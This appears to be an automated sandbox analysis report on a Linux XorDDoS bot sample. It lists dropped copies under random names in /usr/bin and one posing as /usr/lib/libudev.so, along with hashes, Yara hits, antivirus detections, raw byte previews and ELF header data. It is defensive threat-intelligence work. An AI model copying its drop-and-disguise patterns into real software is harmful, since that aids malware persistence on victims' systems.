Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ibkljkndlm

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	610304
Entropy (8bit):	6.209320084905849
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl3
MD5:	F8791A37A2A28594F2B8789A944E9D72
SHA1:	10362164DC9F61A9B2C00499369D681E08D07FC8
SHA-256:	2CD0E75134328030CA389CBB61CDCB6578E9A5426663607E752C1074C7602533
SHA-512:	4C379D39DA1ACA1C72F471B381D76524F5E8A67DE05086540DB8C253FA403E528DB1B5ABBBCA3B14EB9B7DC006A8D3EDEFE54C0FCE3D6C93E44B0E75178A60ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ibkljkndlm, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ibkljkndlm, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/iulapzbfpq

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244374588161023
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AN:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91M
MD5:	7800F11C348419E086E37DFB8E609C16
SHA1:	78AEDAA1E62826E96C4F344369AA21CD399C6C1B
SHA-256:	9B642F0CC0A5B37B22E56551D01C716C5EBC68F84627EE1240B79DC9FFEBD3DB
SHA-512:	16D2556850FFA107DCB07E1E585622C0F4067448E1F08464CA39F7CC6E5339E3C38117BE796971EE3CBFF2727B529738498814089CF2D9DB77D5A38FD4E968A9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/iulapzbfpq, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/iulapzbfpq, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/iulapzbfpq, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/kigdktzeum

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244383305929234
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/914
MD5:	487AAA06EE19B8DFAA6A6B2EEF2535E4
SHA1:	D628F6DE8896C7C26E8BAD77FCE1961C312D207F
SHA-256:	3B64DB86094C0BAFC0D90B55E8D1145E24185E88ECF9A923BFA46A4FB5FC9D88
SHA-512:	D2FE395A6684DB5CE5E63245EBEA2A6E75EB10F93D53609CAD1430BA9DFC11588409C05563BA9D1F33840E81ED0A10184400700276AC381B4F357F016DDEC716
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/kigdktzeum, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/kigdktzeum, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/kigdktzeum, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/mizdkrdyqj

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244374219217551
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1A3:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91q
MD5:	E0198A1A12F1F0963EE32AEAE9384D8B
SHA1:	EDCDFCA89E83051422B2B0C192F72F085B8377F7
SHA-256:	3F28E7ECAAEFF87714B439ED244CCBE4C6BE7A49D71859B304C96213961FBFF1
SHA-512:	3D9AC3CE9A92FE031ACBB61B0ED531F1C13042BF867A99D5E5E1312C7AA572CE0ED4D098B0EB296BA9F6228BC0FF4C67C3E5970D7A703E9F413661EAF5A67FE2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mizdkrdyqj, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/mizdkrdyqj, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mizdkrdyqj, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/posifzmmhg

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244382322931526
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AJ:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/918
MD5:	1537102237A8F774A8EC3660DED7EA96
SHA1:	8A316C97E81283DA018F40E009AD46D3D79611F2
SHA-256:	CD44A667561A64DB1B2CF36CC2A1A70E324516DFD648B863AEFBCDE7F476F30A
SHA-512:	4FB8858C959442C08FA9632AB16669BAB5AAC2320D37EF26231A908EFCA1B7D3C8B3591AC26C54275330ECF7C9945142BF42196288EA2536C153B4F2AB0734A1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/posifzmmhg, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/posifzmmhg, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/posifzmmhg, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/qrabekbstr

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.2443841351103435
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Ai:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/913
MD5:	1975C0CA7E1B7192BCCB225AF16F47B5
SHA1:	4502512CA11FE1557351D01696379CD4B1A61ED5
SHA-256:	361D454FF3E25D4817999BE5479ED5A57CE8483FF296534DA69EFF22DAA2EC5C
SHA-512:	751DCB6E935CB34C5AA84CDB24874639469E35E558BE0C3B22AED5A446EAD4FF260674C30B2BE41E7D678BA2F2F09F3A182C927D0976CEDC27705AD5F51EB15D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qrabekbstr, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qrabekbstr, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qrabekbstr, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/sotpizdssr

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.2443797709295135
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91f
MD5:	60D7D2347AB3A1DD326249CA54EBFD91
SHA1:	CDEF088D12FDBF406DE3A3AC0C20D92D25F97CB3
SHA-256:	33E984A5259CE63099E626B26B54ECF767F165F58D8679C8ADCA3B73165FFFEC
SHA-512:	2AA7C517463861576B0622101161E6574290DF3DB538F68B4D9623A5739D1329FCEED7A3BADD5D7B0F5325465575040B191B998B793C9634D3EFCEE87624B737
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sotpizdssr, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/sotpizdssr, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sotpizdssr, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/sxruomujjd

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244382117358649
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AX:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91C
MD5:	CBA8307E43BFF3556880DCD526A511A5
SHA1:	9655FAC05DB014E498D807E4ADDFDA43756098C3
SHA-256:	91B91DC5E316ED6240B86DA3AC43C62BDDC64776701F127648E68DDFF816C1E9
SHA-512:	764A34406357FA840B90543C3CB8173861752179098C100ED389B79F817BE86736661C6942A8D9AE9642DDA5D5C066C0E777D410D83DE36F665224B2F5F1D78B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sxruomujjd, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/sxruomujjd, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sxruomujjd, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wvbxepjyjx

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244382673094052
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Ah:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/910
MD5:	8C8E618EFD671F62350F8FF8336CB8BC
SHA1:	97057940B690DDF8EC246528BB9E6F76A33B45DB
SHA-256:	E8CFF2EC6E81CE465B0AAF32D1BA5EB2DC83257C49710AF37471789AB450AC87
SHA-512:	456CD713C3AF89B4660D3DDE98B36F82849541D6F5EBBEBA8C6CF47311C8CBB479C9B27CAD2DB506F5E16EC25B24246726AD7CF769DCF622D14C98C65A45B840
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wvbxepjyjx, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wvbxepjyjx, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wvbxepjyjx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/lib/libudev.so

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625867
Entropy (8bit):	6.244347907365657
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91h
MD5:	A14578469FAB44514DFCA6C4EEAD755D
SHA1:	CF09EC13381B559A9D0E2CED5D8D710C8BA2AFFA
SHA-256:	3BB61C0AD19495AE554363823EB83657B403C3AACDF9CDDB9B111C2C4321A6DA
SHA-512:	D512738B7732DE3EEC37E9EB024D4FC592F13190BBE069B1884F9B6348357E4EAFCB1CA01ED75E4D8BB9CAC7164CBD006A18E5467D24A17B540124652FA1EB27
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 72%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Entropy (8bit):	6.244347907365657
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	HaJTqGiPpD
File size:	625'867 bytes
MD5:	a14578469fab44514dfca6c4eead755d
SHA1:	cf09ec13381b559a9d0e2ced5d8d710c8ba2affa
SHA256:	3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
SHA512:	d512738b7732de3eec37e9eb024d4fc592f13190bbe069b1884f9b6348357e4eafcb1ca01ed75e4d8bb9cac7164cbd006a18e5467d24a17b540124652fa1eb27
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91h
TLSH:	A3D47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
File Content Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	553480
Section Header Size:	40
Number of Section Headers:	28
Header String Table Index:	25

Sections

